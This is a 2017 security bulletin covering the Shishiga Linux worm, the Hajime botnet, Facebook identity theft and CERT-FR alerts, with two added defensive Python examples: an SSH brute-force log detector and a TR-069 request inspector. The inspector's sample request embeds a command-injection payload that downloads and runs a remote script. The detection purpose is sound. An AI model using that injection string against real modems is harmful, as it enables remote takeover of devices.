Security Bulletin #96

2017 / 04 / 27

Linux Shishiga malware, a threat in dangerous evolution


Malware researchers from ESET have discovered a new Linux malware, dubbed Linux/Shishiga, targeting systems in the wild. Linux/Shishiga speaks four different protocols (SSH, Telnet, HTTP and BitTorrent) and implements a modular architecture built on Lua scripts. Its spreading mechanism is brute force: Shishiga relies on weak, default credentials to plant itself on insecure systems, trying a built-in password list against each target. Although Shishiga has many similarities with other recent malware that abuses weak Telnet and SSH credentials, researchers consider it more sophisticated because of its use of the BitTorrent protocol and Lua modules. To keep your devices from being infected by Shishiga and similar worms, do not leave default Telnet and SSH credentials in place.
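The worm's spreading mechanism, password guessing over SSH and Telnet, is exactly what a host's authentication log records, so a practical companion to the advice above is a check that spots it. The following is an added example, not code from ESET or from the Shishiga analysis. It is written for OpenSSH's auth.log format (Hajime's Telnet module, covered in the next item, leaves comparable traces in whatever the telnet daemon logs, but that format is not handled here). The log lines, the 60-second window and the thresholds are constructed for illustration:

```python
"""Flag SSH password-guessing sources in sshd log lines.

Added example for this bulletin; not code from ESET or from the
Shishiga analysis. SAMPLE_LOG is constructed to resemble OpenSSH's
auth.log output, and the window/thresholds are illustrative.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# OpenSSH logs guesses against valid and invalid usernames slightly
# differently ("invalid user" prefix); capture both, plus successes.
AUTH_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s+\d\d:\d\d:\d\d)\s+\S+\s+sshd\[\d+\]:\s+"
    r"(?P<kind>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+ ssh2$"
)

# Constructed sample: one source sprays a default-credential list and
# eventually gets in; another is a user mistyping a password twice.
SAMPLE_LOG = """\
Apr 27 10:00:01 gw sshd[2101]: Failed password for root from 203.0.113.5 port 40122 ssh2
Apr 27 10:00:02 gw sshd[2102]: Failed password for invalid user admin from 203.0.113.5 port 40123 ssh2
Apr 27 10:00:02 gw sshd[2103]: Failed password for root from 203.0.113.5 port 40124 ssh2
Apr 27 10:00:03 gw sshd[2104]: Failed password for invalid user pi from 203.0.113.5 port 40125 ssh2
Apr 27 10:00:03 gw sshd[2105]: Failed password for invalid user ubnt from 203.0.113.5 port 40126 ssh2
Apr 27 10:00:04 gw sshd[2106]: Failed password for invalid user guest from 203.0.113.5 port 40127 ssh2
Apr 27 10:00:05 gw sshd[2107]: Accepted password for root from 203.0.113.5 port 40128 ssh2
Apr 27 10:05:00 gw sshd[2200]: Failed password for alice from 198.51.100.7 port 51000 ssh2
Apr 27 10:05:30 gw sshd[2201]: Failed password for alice from 198.51.100.7 port 51001 ssh2
Apr 27 10:05:40 gw sshd[2202]: Accepted publickey for alice from 198.51.100.7 port 51002 ssh2
"""

WINDOW = timedelta(seconds=60)   # illustrative values, tune per environment
MIN_FAILURES = 5
MIN_DISTINCT_USERS = 3


def parse_events(log_text):
    """Yield (timestamp, kind, user, ip) for failed/accepted password logins."""
    for line in log_text.splitlines():
        m = AUTH_RE.match(line)
        if not m:
            continue  # other sshd chatter (disconnects, publickey) is ignored
        # syslog timestamps carry no year; deltas within one run still work
        ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S")
        yield ts, m.group("kind"), m.group("user"), m.group("ip")


def detect_bruteforce(log_text, window=WINDOW, min_failures=MIN_FAILURES,
                      min_users=MIN_DISTINCT_USERS):
    """Return {ip: report} for sources that behave like credential-list sprayers.

    A source is flagged when, inside any `window`, it produces at least
    `min_failures` failed password logins spread over at least `min_users`
    distinct usernames (a single user retyping a password does not trip it).
    A later 'Accepted password' from a flagged source is recorded as a
    probable compromise rather than as a benign login.
    """
    failures = defaultdict(list)   # ip -> [(ts, user)]
    accepted = defaultdict(list)   # ip -> [(ts, user)]
    for ts, kind, user, ip in parse_events(log_text):
        (failures if kind == "Failed" else accepted)[ip].append((ts, user))

    reports = {}
    for ip, events in failures.items():
        events.sort()
        j = 0
        for i in range(len(events)):          # sliding window over failures
            while j < len(events) and events[j][0] - events[i][0] <= window:
                j += 1
            burst = events[i:j]
            users = {u for _, u in burst}
            if len(burst) >= min_failures and len(users) >= min_users:
                last_fail = burst[-1][0]
                reports[ip] = {
                    "failures": len(burst),
                    "users": sorted(users),
                    "accepted_after": any(t >= last_fail for t, _ in accepted.get(ip, [])),
                }
                break
    return reports


if __name__ == "__main__":
    for ip, report in detect_bruteforce(SAMPLE_LOG).items():
        print(ip, report)
```

Run against the sample, only 203.0.113.5 is reported (six failures across five usernames, followed by a successful password login, which is the case that warrants an immediate credential reset and host triage); the two failures from 198.51.100.7 stay below both thresholds.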


Hajime Botnet Grows to 300,000 IoT Devices


According to Kaspersky, Hajime, a piece of Internet of Things (IoT) malware that emerged in October 2016, has already ensnared roughly 300,000 devices in a botnet. Once on a device, it closes some ports to keep the infected device away from similar threats. Hajime's author continues to update the code; the most recent changes were seen in the attack module. At the moment the worm supports three attack methods: TR-069 exploitation, a Telnet default-password attack, and an Arris cable modem password-of-the-day attack. TR-069 (Technical Report 069) is used by ISPs to manage modems remotely via TCP port 7547 (some devices use port 5555). By abusing the TR-069 NewNTPServer feature, attackers can execute arbitrary commands on vulnerable devices. The authors focused on specific brands and devices: the worm tries only a small set of username-password combinations when brute-forcing its way in. When it encounters an Arris cable modem, the malware uses a specially crafted password of the day instead of the Telnet password list. The most intriguing thing about Hajime is its purpose. While the botnet keeps growing, partly thanks to the new exploitation modules, its purpose remains unknown; Kaspersky says it has not seen Hajime used in any type of attack or malicious activity.
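The TR-069 abuse above is command injection: the NewNTPServer parameters of the SetNTPServers request are meant to hold NTP host names, and a vulnerable device hands them to a shell. The following is an added example, not code from Kaspersky or the Hajime write-up: it inspects a captured request body for NewNTPServer values that are not plain host names or addresses, which is the check a sensor in front of port 7547 or 5555 would apply. The SOAP body is constructed to resemble a TR-064 SetNTPServers call (the service reachable on the TR-069 port; the exact envelope shape is my assumption), the injected command is a placeholder, and the addresses are from documentation space.

```python
"""Inspect captured TR-064/TR-069 SOAP bodies for NewNTPServer command injection.

Added example for this bulletin; not code from Kaspersky or the Hajime
analysis. SAMPLE_REQUEST is constructed to resemble a SetNTPServers call;
the envelope layout is an assumption and the payload is a placeholder.
"""
import re
import xml.etree.ElementTree as ET

# An NTP server parameter should be a host name or IP address, nothing more.
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9.-]{1,253}$")
# Shell metacharacters that have no business in a host name field.
SHELL_META = set("`$;|&<>(){}\n")

SAMPLE_REQUEST = """<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
  SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
 <SOAP-ENV:Body>
  <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">
   <NewNTPServer1>`wget http://198.51.100.9/a -O /tmp/a;sh /tmp/a`</NewNTPServer1>
   <NewNTPServer2>pool.ntp.org</NewNTPServer2>
   <NewNTPServer3></NewNTPServer3>
  </u:SetNTPServers>
 </SOAP-ENV:Body>
</SOAP-ENV:Envelope>
"""


def extract_ntp_params(body):
    """Return [(name, value)] for every NewNTPServerN element in a SOAP body.

    Falls back to a regex when the XML is malformed: an attacker has no
    reason to send a well-formed envelope, and a parser failure must not
    make the payload invisible to the check.
    """
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return [(m.group(1), m.group(2))
                for m in re.finditer(r"<(NewNTPServer\d+)>(.*?)</\1>", body, re.S)]
    params = []
    for el in root.iter():
        local = el.tag.rsplit("}", 1)[-1]     # strip any namespace prefix
        if local.startswith("NewNTPServer"):
            params.append((local, el.text or ""))
    return params


def inspect_request(body):
    """Flag NewNTPServer values that are not plain host names or addresses."""
    findings = []
    for name, value in extract_ntp_params(body):
        if value == "":
            continue  # unset server slots are normal
        if SHELL_META & set(value):
            findings.append({"param": name, "value": value,
                             "reason": "shell metacharacters"})
        elif not HOSTNAME_RE.match(value):
            findings.append({"param": name, "value": value,
                             "reason": "not a hostname or address"})
    return findings


if __name__ == "__main__":
    for finding in inspect_request(SAMPLE_REQUEST):
        print(finding)
```

Against the sample only NewNTPServer1 is reported; pool.ntp.org passes and the empty third slot is ignored. A body that does not parse as XML at all is still scanned, so a deliberately broken envelope does not slip through.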

How much are you giving away to fraudsters on Facebook?


How much personal information are you giving fraudsters access to on Facebook? Are you giving them enough to steal your identity? Deterring fraudsters may not be as simple as hiding this information in your profile. They can still work out when you were born from the birthday messages posted on your timeline, and even if they don't know where you live, they may be able to find that out from your name and date of birth: online directories hold huge quantities of information, from addresses and phone numbers to lists of your past and present housemates. All of this can be pieced together to assume your identity. Armed with these three key pieces of information (name, date of birth and address), fraudsters can obtain fake identification documents such as replica passports over the internet. Fake documentation then opens the door to loans, credit cards, mobile phones and more, all taken out in your name.

CERT-FR Weekly News Alert

Current Alerts

CERTFR-2017-ALE-008: Vulnerability in RDP for Microsoft Windows XP and Windows Server 2003 (14 April 2017)

Link: http://cert.ssi.gouv.fr/site/CERTFR-2017-ALE-008.pdf

CERTFR-2017-ALE-006: Multiple vulnerabilities in Siemens RUGGEDCOM ROX I (29 March 2017)

Link: http://cert.ssi.gouv.fr/site/CERTFR-2017-ALE-006.pdf

CERTFR-2017-ALE-005: Vulnerability in Cisco switches (20 March 2017)

Link: http://cert.ssi.gouv.fr/site/CERTFR-2017-ALE-005.pdf

Patches

CERTFR-2017-AVI-131: Multiple vulnerabilities in the SUSE Linux kernel (26 April 2017)

Link: http://cert.ssi.gouv.fr/site/CERTFR-2017-AVI-131.pdf

CERTFR-2017-AVI-130: Multiple vulnerabilities in Adobe ColdFusion (26 April 2017)

Link: http://cert.ssi.gouv.fr/site/CERTFR-2017-AVI-130.pdf

CERTFR-2017-AVI-129: Multiple vulnerabilities in IBM Domino (26 April 2017)

Link: http://cert.ssi.gouv.fr/site/CERTFR-2017-AVI-129.pdf

CERTFR-2017-AVI-128: Multiple vulnerabilities in the Ubuntu Linux kernel (25 April 2017)

Link: http://cert.ssi.gouv.fr/site/CERTFR-2017-AVI-128.pdf